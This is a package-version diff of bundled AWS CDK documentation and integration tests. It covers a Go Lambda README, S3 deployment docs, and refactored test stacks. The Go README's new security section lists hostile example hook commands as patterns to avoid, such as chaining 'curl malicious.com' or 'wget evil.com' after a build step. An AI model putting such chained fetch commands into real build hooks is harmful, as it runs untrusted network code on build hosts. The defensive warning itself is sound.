konokenj.cdk-api-mcp-server 0.52.0__py3-none-any.whl → 0.53.0__py3-none-any.whl

cdk_api_mcp_server/__about__.py

@@ -1,4 +1,4 @@
 # SPDX-FileCopyrightText: 2025-present Kenji Kono <konoken@amazon.co.jp>
 #
 # SPDX-License-Identifier: MIT
-__version__ = "0.52.0"
+__version__ = "0.53.0"

cdk_api_mcp_server/resources/aws-cdk/constructs/@aws-cdk/aws-lambda-go-alpha/README.md

@@ -170,6 +170,8 @@ new go.GoFunction(this, 'handler', {
 });
 ```
 
+**⚠️ Security Warning**: Build flags are passed directly to the Go build command and can execute arbitrary commands during bundling. Only use trusted values and avoid flags like `-toolexec` with untrusted arguments. Be especially cautious with third-party CDK constructs that may contain malicious build flags. The CDK will display a warning during synthesis when `goBuildFlags` is used.
+
 By default this construct doesn't use any Go module proxies. This is contrary to
 a standard Go installation, which would use the Google proxy by default. To
 recreate that behavior, do the following:
@@ -200,19 +202,21 @@ new go.GoFunction(this, 'GoFunction', {
 
 ## Command hooks
 
-It is  possible to run additional commands by specifying the `commandHooks` prop:
+It is possible to run additional commands by specifying the `commandHooks` prop:
 
-```text
-// This example only available in TypeScript
+```ts
 // Run additional commands on a GoFunction via `commandHooks` property
 new go.GoFunction(this, 'handler', {
+  entry: 'cmd/api',
   bundling: {
     commandHooks: {
       // run tests
       beforeBundling(inputDir: string): string[] {
         return ['go test ./cmd/api -v'];
       },
-      // ...
+      afterBundling(inputDir: string, outputDir: string): string[] {
+        return ['echo "Build complete"'];
+      },
     },
   },
 });
@@ -230,6 +234,100 @@ an array of commands to run. Commands are chained with `&&`.
 The commands will run in the environment in which bundling occurs: inside the
 container for Docker bundling or on the host OS for local bundling.
 
+### ⚠️ Security Considerations
+
+**Command hooks execute arbitrary shell commands** during the bundling process. Only use trusted commands:
+
+**Safe patterns (cross-platform):**
+
+```ts
+new go.GoFunction(this, 'SafeFunction', {
+  entry: 'cmd/api',
+  bundling: {
+    commandHooks: {
+      beforeBundling: () => [
+        'go test ./...',           // ✅ Standard Go commands work on all OS
+        'go mod tidy',             // ✅ Go module commands
+        'make clean',              // ✅ Build tools (if available)
+        'echo "Building app"',     // ✅ Simple output with quotes
+      ],
+      afterBundling: () => ['echo "Build complete"'],
+    },
+  },
+});
+```
+
+**Dangerous patterns to avoid:**
+
+*Windows-specific dangers:*
+
+```ts
+// ❌ Windows-specific dangers
+new go.GoFunction(this, 'UnsafeWindowsFunction', {
+  entry: 'cmd/api',
+  bundling: {
+    commandHooks: {
+      beforeBundling: () => [
+        'go test & curl.exe malicious.com',     // ❌ Command chaining with &
+        'echo %USERPROFILE%',                   // ❌ Environment variable expansion
+        'powershell -Command "..."',            // ❌ PowerShell execution
+      ],
+      afterBundling: () => [],
+    },
+  },
+});
+```
+
+*Unix/Linux/macOS dangers:*
+
+```ts
+// ❌ Unix/Linux/macOS dangers
+new go.GoFunction(this, 'UnsafeUnixFunction', {
+  entry: 'cmd/api',
+  bundling: {
+    commandHooks: {
+      beforeBundling: () => [
+        'go test; curl malicious.com',          // ❌ Command chaining with ;
+        'echo $(whoami)',                       // ❌ Command substitution
+        'bash -c "wget evil.com"',              // ❌ Shell execution
+      ],
+      afterBundling: () => [],
+    },
+  },
+});
+```
+
+**When using third-party constructs** that include `GoFunction`:
+
+* Review the construct's source code before use
+* Verify what commands it executes via `commandHooks` and `goBuildFlags`
+* Only use constructs from trusted publishers
+* Test in isolated environments first
+
+The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected.
+
+For more security guidance, see [AWS CDK Security Best Practices](https://docs.aws.amazon.com/cdk/latest/guide/security.html).
+
+## Security Best Practices
+
+### Third-Party Construct Safety
+
+When using third-party CDK constructs that utilize `GoFunction`, exercise caution:
+
+1. **Review source code** - Inspect the construct implementation for `commandHooks` and `goBuildFlags` usage
+2. **Verify publishers** - Use constructs only from trusted, verified sources  
+3. **Pin versions** - Use exact versions to prevent supply chain attacks
+4. **Isolated testing** - Test third-party constructs in sandboxed environments
+
+**Before using any third-party construct:**
+
+* Review the construct's source code on GitHub or npm
+* Search for `commandHooks` and `goBuildFlags` usage in the code
+* Verify no dangerous command patterns are present
+* Use exact version pinning to prevent supply chain attacks
+
+The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected.
+
 ## Additional considerations
 
 Depending on how you structure your Golang application, you may want to change the `assetHashType` parameter.

cdk_api_mcp_server/resources/aws-cdk/constructs/aws-cdk-lib/aws-codebuild/README.md

@@ -651,7 +651,6 @@ const project = new codebuild.Project(this, 'MyProject', {
   // vpc,
 });
 ```
->>>>>>> 39ec36ec6a (feat(codebuild): add custom instance type and VPC to Fleets)
 
 ## Logs
 

cdk_api_mcp_server/resources/aws-cdk/constructs/aws-cdk-lib/aws-s3-deployment/README.md

@@ -1,6 +1,5 @@
 # AWS S3 Deployment Construct Library
 
-
 This library allows populating an S3 bucket with the contents of .zip files
 from other S3 buckets or from local disk.
 
@@ -83,7 +82,7 @@ User: *** is not authorized to perform: kms:Decrypt on the resource associated w
 because no identity-based policy allows the kms:Decrypt action
 ```
 
-When this happens, users can use the public `handlerRole` property of `BucketDeployment` to manually 
+When this happens, users can use the public `handlerRole` property of `BucketDeployment` to manually
 add the KMS permissions:
 
 ```ts
@@ -375,6 +374,7 @@ resource handler.
 > of memory and storage size.
 
 ## JSON-Aware Source Processing
+
 When using `Source.jsonData` with CDK Tokens (references to construct properties), you may need to enable the escaping option. This is particularly important when the referenced properties might contain special characters that require proper JSON escaping (like double quotes, line breaks, etc.).
 
 ```ts
@@ -462,7 +462,7 @@ to make from placeholders in a local file which will be resolved during deployme
 is especially useful in situations like creating an API from a spec file, where users might
 want to reference other CDK resources they have created.
 
-The syntax for template variables is `{{ variableName }}` in your local file. Then, you would 
+The syntax for template variables is `{{ variableName }}` in your local file. Then, you would
 specify the substitutions in CDK like this:
 
 ```ts
@@ -486,7 +486,7 @@ new s3deploy.DeployTimeSubstitutedFile(this, 'MyFile', {
 ```
 
 Nested variables, like `{{ {{ foo }} }}` or `{{ foo {{ bar }} }}`, are not supported by this
-construct. In the first case of a single variable being is double nested `{{ {{ foo }} }}`, only 
+construct. In the first case of a single variable being is double nested `{{ {{ foo }} }}`, only
 the `{{ foo }}` would be replaced by the substitution, and the extra brackets would remain in the file.
 In the second case of two nexted variables `{{ foo {{ bar }} }}`, only the `{{ bar }}` would be replaced
 in the file.
@@ -533,6 +533,67 @@ new cdk.CfnOutput(this, 'ObjectKey', {
 });
 ```
 
+## Specifying a Custom VPC, Subnets, and Security Groups in BucketDeployment
+
+By default, the AWS CDK BucketDeployment construct runs in a publicly accessible environment. However, for enhanced security and compliance, you may need to deploy your assets from within a VPC while restricting network access through custom subnets and security groups.
+
+### Using a Custom VPC
+
+To deploy assets within a private network, specify the vpc property in BucketDeploymentProps. This ensures that the deployment Lambda function executes within your specified VPC.
+
+```ts
+const vpc = ec2.Vpc.fromLookup(this, 'ExistingVPC', { vpcId: 'vpc-12345678' });
+const bucket = new s3.Bucket(this, 'MyBucket');
+
+new s3deploy.BucketDeployment(this, 'DeployToS3', {
+    destinationBucket: bucket,
+    vpc: vpc, 
+    sources: [s3deploy.Source.asset('./website')],
+});
+```
+
+### Specifying Subnets for Deployment
+
+By default, when you specify a VPC, the BucketDeployment function is deployed in the private subnets of that VPC.
+However, you can customize the subnet selection using the vpcSubnets property.
+
+```ts
+const vpc = ec2.Vpc.fromLookup(this, 'ExistingVPC', { vpcId: 'vpc-12345678' });
+const bucket = new s3.Bucket(this, 'MyBucket');
+
+new s3deploy.BucketDeployment(this, 'DeployToS3', {
+    destinationBucket: bucket,
+    vpc: vpc,
+    vpcSubnets: { subnetType: ec2.SubnetType.PUBLIC },
+    sources: [s3deploy.Source.asset('./website')],
+});
+```
+
+### Defining Custom Security Groups
+
+For enhanced network security, you can now specify custom security groups in BucketDeploymentProps.
+This allows fine-grained control over ingress and egress rules for the deployment Lambda function.
+
+```ts
+const vpc = ec2.Vpc.fromLookup(this, 'ExistingVPC', { vpcId: 'vpc-12345678' });
+const bucket = new s3.Bucket(this, 'MyBucket');
+
+const securityGroup = new ec2.SecurityGroup(this, 'CustomSG', {
+    vpc: vpc,
+    description: 'Allow HTTPS outbound access',
+    allowAllOutbound: false,
+});
+
+securityGroup.addEgressRule(ec2.Peer.anyIpv4(), ec2.Port.tcp(443), 'Allow HTTPS traffic');
+
+new s3deploy.BucketDeployment(this, 'DeployWithSecurityGroup', {
+    destinationBucket: bucket,
+    vpc: vpc,
+    securityGroups: [securityGroup],
+    sources: [s3deploy.Source.asset('./website')],
+});
+```
+
 ## Notes
 
 - This library uses an AWS CloudFormation custom resource which is about 10MiB in

cdk_api_mcp_server/resources/aws-cdk/constructs/aws-cdk-lib/aws-s3-deployment/integ.bucket-deployment-big-response.ts

@@ -11,6 +11,12 @@ import { ExpectedResult } from '@aws-cdk/integ-tests-alpha';
 
 const numFiles = 50;
 
+/**
+ * Integration test for bucket deployment with many sources (big response):
+ * - Tests deployment with 50 source files to validate response size handling
+ * - Uses increased memory limit (2048MB) for large deployments
+ * - Validates that objectKeys output is disabled when outputObjectKeys is false
+ */
 class TestBucketDeployment extends cdk.Stack {
   public readonly destinationBucket: s3.IBucket;
   constructor(scope: Construct, id: string, props?: cdk.StackProps) {
@@ -21,6 +27,7 @@ class TestBucketDeployment extends cdk.Stack {
       autoDeleteObjects: true, // needed for integration test cleanup
     });
 
+    // Create multiple source files to test big response handling
     const sources = [];
     for (let i = 0; i < numFiles; i++) {
       const tempDir = fs.mkdtempSync(path.join(os.tmpdir(), 'tmpcdk'));
@@ -31,17 +38,17 @@ class TestBucketDeployment extends cdk.Stack {
       sources.push(s3deploy.Source.asset(tempDir));
     }
 
-    const deploymentBucket = new s3deploy.BucketDeployment(this, 'DeployMe', {
+    const deployment = new s3deploy.BucketDeployment(this, 'DeployWithManySources', {
       sources: sources,
       destinationBucket: this.destinationBucket,
       memoryLimit: 2048,
-      retainOnDelete: false, // default is true, which will block the integration test cleanup
+      retainOnDelete: false,
       outputObjectKeys: false,
     });
 
     new CfnOutput(this, 'customResourceData', {
       value: Fn.sub('Object Keys are${keys}', {
-        keys: Fn.join(',', deploymentBucket.objectKeys),
+        keys: Fn.join(',', deployment.objectKeys),
       }),
     });
   }
@@ -54,12 +61,12 @@ const app = new cdk.App({
 });
 const testCase = new TestBucketDeployment(app, 'test-bucket-deployments-too-many-sources');
 
-const integTest = new integ.IntegTest(app, 'integ-test-bucket-deployments', {
+const integTest = new integ.IntegTest(app, 'integ-test-bucket-deployment-big-response', {
   testCases: [testCase],
   diffAssets: true,
 });
 
-// Assert that DeployMeWithoutExtractingFilesOnDestination deploys a zip file to bucket4
+// Assert that all files were successfully deployed
 for (let i = 0; i < numFiles; i++) {
   const apiCall = integTest.assertions.awsApiCall('S3', 'getObject', {
     Bucket: testCase.destinationBucket.bucketName,
@@ -73,7 +80,7 @@ for (let i = 0; i < numFiles; i++) {
   apiCall.assertAtPath('Body', ExpectedResult.stringLikeRegexp(`This is file number ${i + 1}`));
 }
 
-// Assert that there is no object keys returned from the custom resource
+// Assert that objectKeys output is empty when outputObjectKeys is false
 const describe = integTest.assertions.awsApiCall('CloudFormation', 'describeStacks', {
   StackName: 'test-bucket-deployments-too-many-sources',
 });

cdk_api_mcp_server/resources/aws-cdk/constructs/aws-cdk-lib/aws-s3-deployment/integ.bucket-deployment-cloudfront.ts

@@ -1,27 +1,29 @@
 import * as path from 'path';
 import * as cloudfront from 'aws-cdk-lib/aws-cloudfront';
+import * as origins from 'aws-cdk-lib/aws-cloudfront-origins';
 import * as s3 from 'aws-cdk-lib/aws-s3';
 import * as cdk from 'aws-cdk-lib';
 import * as s3deploy from 'aws-cdk-lib/aws-s3-deployment';
-import { IntegTest } from '@aws-cdk/integ-tests-alpha';
+import * as integ from '@aws-cdk/integ-tests-alpha';
+import { Construct } from 'constructs';
 
-class TestBucketDeployment extends cdk.Stack {
-  constructor(scope: cdk.App, id: string) {
-    super(scope, id);
+/**
+ * Integration test for bucket deployment with CloudFront distribution invalidation:
+ * - Deploys files to S3 bucket behind CloudFront distribution
+ * - Tests that CloudFront cache invalidation works with bucket deployments
+ */
+class TestBucketDeploymentCloudFront extends cdk.Stack {
+  constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
 
-    const bucket = new s3.Bucket(this, 'Destination3', {
+    const bucket = new s3.Bucket(this, 'Destination', {
       removalPolicy: cdk.RemovalPolicy.DESTROY,
       autoDeleteObjects: true, // needed for integration test cleanup
     });
-    const distribution = new cloudfront.CloudFrontWebDistribution(this, 'Distribution', {
-      originConfigs: [
-        {
-          s3OriginSource: {
-            s3BucketSource: bucket,
-          },
-          behaviors: [{ isDefaultBehavior: true }],
-        },
-      ],
+    const distribution = new cloudfront.Distribution(this, 'Distribution', {
+      defaultBehavior: {
+        origin: origins.S3BucketOrigin.withOriginAccessControl(bucket),
+      },
     });
 
     new s3deploy.BucketDeployment(this, 'DeployWithInvalidation', {
@@ -29,7 +31,7 @@ class TestBucketDeployment extends cdk.Stack {
       destinationBucket: bucket,
       distribution,
       distributionPaths: ['/images/*.png'],
-      retainOnDelete: false, // default is true, which will block the integration test cleanup
+      retainOnDelete: false,
     });
   }
 }
@@ -41,10 +43,10 @@ const app = new cdk.App({
   },
 });
 
-const stack = new TestBucketDeployment(app, 'test-bucket-deployments-1');
+const testCase = new TestBucketDeploymentCloudFront(app, 'test-bucket-deployment-cloudfront');
 
-new IntegTest(app, 'TestBucketDeploymentInteg', {
-  testCases: [stack],
+new integ.IntegTest(app, 'integ-test-bucket-deployment-cloudfront', {
+  testCases: [testCase],
   diffAssets: true,
 });
 

cdk_api_mcp_server/resources/aws-cdk/constructs/aws-cdk-lib/aws-s3-deployment/integ.bucket-deployment-cross-nested-stack-source.ts

@@ -6,6 +6,12 @@ import * as integ from '@aws-cdk/integ-tests-alpha';
 import { ExpectedResult } from '@aws-cdk/integ-tests-alpha';
 import { Construct } from 'constructs';
 
+/**
+ * Integration test for bucket deployment with cross-nested-stack references:
+ * - Tests that Source.jsonData() can use values from resources in nested stacks
+ * - Validates that cross-nested-stack token resolution works correctly
+ * - Tests token substitution across nested stack boundaries
+ */
 class ResourceNestedStack extends NestedStack {
   userPool: UserPool;
   constructor (scope: Construct, id: string, props: NestedStackProps = {}) {
@@ -23,7 +29,7 @@ class DeploymentNestedStack extends NestedStack {
   constructor (scope: Construct, id: string, props: DeploymentNestedStackProps) {
     super(scope, id, props);
     this.bucket = new Bucket(this, 'Bucket');
-    new BucketDeployment(this, 'Deployment', {
+    new BucketDeployment(this, 'DeployWithCrossNestedStackSource', {
       destinationBucket: this.bucket,
       sources: [
         Source.jsonData('appconfig.json', { userPoolId: props.userPool.userPoolId }),

cdk_api_mcp_server/resources/aws-cdk/constructs/aws-cdk-lib/aws-s3-deployment/integ.bucket-deployment-cross-stack-source.ts

@@ -6,6 +6,11 @@ import { Construct } from 'constructs';
 import { BucketDeployment, Source } from 'aws-cdk-lib/aws-s3-deployment';
 import { Bucket } from 'aws-cdk-lib/aws-s3';
 
+/**
+ * Integration test for bucket deployment with cross-stack references:
+ * - Tests that Source.data() can use values from resources in other stacks
+ * - Validates that cross-stack token resolution works correctly
+ */
 class Stack2 extends Stack {
   userPool: UserPool;
 
@@ -21,7 +26,7 @@ class Stack1 extends Stack {
   constructor (scope: Construct, id: string, props: { userPool: UserPool }) {
     super(scope, id);
     this.bucket = new Bucket(this, 'bucket');
-    new BucketDeployment(this, 'XXXXXXXXXX', {
+    new BucketDeployment(this, 'DeployWithCrossStackSource', {
       destinationBucket: this.bucket,
       sources: [
         Source.data('test.txt', props.userPool.userPoolId),

cdk_api_mcp_server/resources/aws-cdk/constructs/aws-cdk-lib/aws-s3-deployment/integ.bucket-deployment-cross-stack-ssm-source.ts

@@ -5,6 +5,12 @@ import * as s3deploy from 'aws-cdk-lib/aws-s3-deployment';
 import * as ssm from 'aws-cdk-lib/aws-ssm';
 import * as integ from '@aws-cdk/integ-tests-alpha';
 
+/**
+ * Integration test for bucket deployment with cross-stack SSM parameter references:
+ * - Tests that SSM StringListParameter tokens are resolved in Source.jsonData()
+ * - Validates cross-nested-stack parameter references work correctly
+ * - Tests that parameter values are properly serialized in JSON output
+ */
 class SsmStack extends cdk.NestedStack {
   public readonly ssmParam: ssm.StringListParameter;
 
@@ -38,7 +44,7 @@ class S3Stack extends cdk.NestedStack {
       autoDeleteObjects: true,
     });
 
-    new s3deploy.BucketDeployment(this, 'ReproDeployment', {
+    new s3deploy.BucketDeployment(this, 'DeployWithSsmParameter', {
       sources: [
         s3deploy.Source.jsonData('config.json', {
           subnets: readParam.stringListValue,

cdk_api_mcp_server/resources/aws-cdk/constructs/aws-cdk-lib/aws-s3-deployment/integ.bucket-deployment-data.ts

@@ -1,80 +1,101 @@
 import { Bucket } from 'aws-cdk-lib/aws-s3';
-import { App, CfnOutput, RemovalPolicy, Stack, Token } from 'aws-cdk-lib';
+import { App, CfnOutput, RemovalPolicy, Stack, StackProps, Token } from 'aws-cdk-lib';
 import { ExpectedResult, IntegTest } from '@aws-cdk/integ-tests-alpha';
 import { BucketDeployment, Source } from 'aws-cdk-lib/aws-s3-deployment';
 import * as secretsmanager from 'aws-cdk-lib/aws-secretsmanager';
 import * as ssm from 'aws-cdk-lib/aws-ssm';
 import * as path from 'path';
+import { Construct } from 'constructs';
 
-const app = new App({
-  postCliContext: {
-    '@aws-cdk/aws-lambda:useCdkManagedLogGroup': false,
-  },
-});
-const stack = new Stack(app, 'TestBucketDeploymentContent');
-const bucket = new Bucket(stack, 'Bucket', {
-  removalPolicy: RemovalPolicy.DESTROY, // Allow bucket deletion
-  autoDeleteObjects: true, // Delete objects when bucket is deleted
-});
+/**
+ * Integration test for bucket deployment with various data source types:
+ * - Tests Source.data(), Source.jsonData(), and Source.yamlData() methods
+ * - Validates token substitution in JSON and YAML files
+ * - Tests proper escaping of special characters (quotes) in JSON files
+ * - Tests addSource() method for dynamically adding sources
+ * - Validates empty string handling
+ */
+class TestBucketDeploymentData extends Stack {
+  public readonly bucket: Bucket;
 
-const file1 = Source.data('file1.txt', 'boom');
-const file2 = Source.data('path/to/file2.txt', `bam! ${bucket.bucketName}`);
-const file3 = Source.jsonData('my-json/config.json', { website_url: bucket.bucketWebsiteUrl });
-const file4 = Source.yamlData('my-yaml/config.yaml', { website_url: bucket.bucketWebsiteUrl });
-const file5 = Source.jsonData('my-json/config2.json', { bucket_domain_name: bucket.bucketWebsiteDomainName });
-
-// Add new test case for secret value with quotes
-const secret = new secretsmanager.Secret(stack, 'TestSecret', {
-  generateSecretString: {
-    secretStringTemplate: JSON.stringify({
-      value: 'test"with"quotes',
-    }),
-    generateStringKey: 'password',
-  },
-});
+  constructor(scope: Construct, id: string, props?: StackProps) {
+    super(scope, id, props);
 
-// Store secret in SSM (workaround for #21503)
-const param = new ssm.StringParameter(stack, 'SecretParam', {
-  stringValue: secret.secretValueFromJson('value').unsafeUnwrap(),
-});
+    this.bucket = new Bucket(this, 'Bucket', {
+      removalPolicy: RemovalPolicy.DESTROY,
+      autoDeleteObjects: true,
+    });
 
-const tokenizedValue = param.stringValue; // This should be a Token
-new CfnOutput(stack, 'IsToken', { value: Token.isUnresolved(tokenizedValue).toString() });
-new CfnOutput(stack, 'SecretValue', { value: tokenizedValue });
+    // Test various data source types with different content
+    const file1 = Source.data('file1.txt', 'boom');
+    const file2 = Source.data('path/to/file2.txt', `bam! ${this.bucket.bucketName}`);
+    const file3 = Source.jsonData('my-json/config.json', { website_url: this.bucket.bucketWebsiteUrl });
+    const file4 = Source.yamlData('my-yaml/config.yaml', { website_url: this.bucket.bucketWebsiteUrl });
+    const file5 = Source.jsonData('my-json/config2.json', { bucket_domain_name: this.bucket.bucketWebsiteDomainName });
 
-// Add new file with secret value that needs proper escaping
-const file6 = Source.jsonData('my-json/secret-config.json', {
-  secret_value: tokenizedValue, // Using the tokenized value explicitly
-}, { escape: true });
-const file7 = Source.yamlData('my-yaml/secret-config.yaml', {
-  secret_value: tokenizedValue,
-});
+    // Test secret value with quotes that need escaping
+    const secret = new secretsmanager.Secret(this, 'TestSecret', {
+      generateSecretString: {
+        secretStringTemplate: JSON.stringify({
+          value: 'test"with"quotes',
+        }),
+        generateStringKey: 'password',
+      },
+    });
 
-// case for empty string
-const file8 = Source.data('file8.txt', '');
+    // Store secret in SSM (workaround for #21503)
+    const param = new ssm.StringParameter(this, 'SecretParam', {
+      stringValue: secret.secretValueFromJson('value').unsafeUnwrap(),
+    });
 
-const deployment = new BucketDeployment(stack, 'DeployMeHere', {
-  destinationBucket: bucket,
-  sources: [file1, file2],
-  destinationKeyPrefix: 'deploy/here/',
-  retainOnDelete: false, // default is true, which will block the integration test cleanup
-});
-deployment.addSource(file3);
-deployment.addSource(file4);
-deployment.addSource(file5);
-deployment.addSource(file6);
-deployment.addSource(file7);
-deployment.addSource(file8);
+    const tokenizedValue = param.stringValue; // This should be a Token
+    new CfnOutput(this, 'IsToken', { value: Token.isUnresolved(tokenizedValue).toString() });
+    new CfnOutput(this, 'SecretValue', { value: tokenizedValue });
+
+    // Test proper escaping of quotes in JSON
+    const file6 = Source.jsonData('my-json/secret-config.json', {
+      secret_value: tokenizedValue,
+    }, { escape: true });
+    // Test YAML file (which doesn't require escaping)
+    const file7 = Source.yamlData('my-yaml/secret-config.yaml', {
+      secret_value: tokenizedValue,
+    });
+
+    // Test empty string handling
+    const file8 = Source.data('file8.txt', '');
+
+    const deployment = new BucketDeployment(this, 'DeployWithDataSources', {
+      destinationBucket: this.bucket,
+      sources: [file1, file2],
+      destinationKeyPrefix: 'deploy/here/',
+      retainOnDelete: false,
+    });
+    // Test addSource() method
+    deployment.addSource(file3);
+    deployment.addSource(file4);
+    deployment.addSource(file5);
+    deployment.addSource(file6);
+    deployment.addSource(file7);
+    deployment.addSource(file8);
+
+    new CfnOutput(this, 'BucketName', { value: this.bucket.bucketName });
+  }
+}
 
-new CfnOutput(stack, 'BucketName', { value: bucket.bucketName });
+const app = new App({
+  postCliContext: {
+    '@aws-cdk/aws-lambda:useCdkManagedLogGroup': false,
+  },
+});
+const testCase = new TestBucketDeploymentData(app, 'test-bucket-deployment-data');
 
-const integ = new IntegTest(app, 'integ-test-bucket-deployment-data', {
-  testCases: [stack],
+const integTest = new IntegTest(app, 'integ-test-bucket-deployment-data', {
+  testCases: [testCase],
 });
 
-// Add assertions to verify the JSON file
-const assertionProvider = integ.assertions.awsApiCall('S3', 'getObject', {
-  Bucket: bucket.bucketName,
+// Assert that addSource() successfully adds the data source alongside the asset source
+const assertionProvider = integTest.assertions.awsApiCall('S3', 'getObject', {
+  Bucket: testCase.bucket.bucketName,
   Key: path.join('deploy/here', 'my-json/secret-config.json'),
 });
 
@@ -85,8 +106,8 @@ assertionProvider.expect(ExpectedResult.objectLike({
 }));
 
 // Add assertions to verify the YAML file
-const yamlAssertionProvider = integ.assertions.awsApiCall('S3', 'getObject', {
-  Bucket: bucket.bucketName,
+const yamlAssertionProvider = integTest.assertions.awsApiCall('S3', 'getObject', {
+  Bucket: testCase.bucket.bucketName,
   Key: path.join('deploy/here', 'my-yaml/secret-config.yaml'),
 });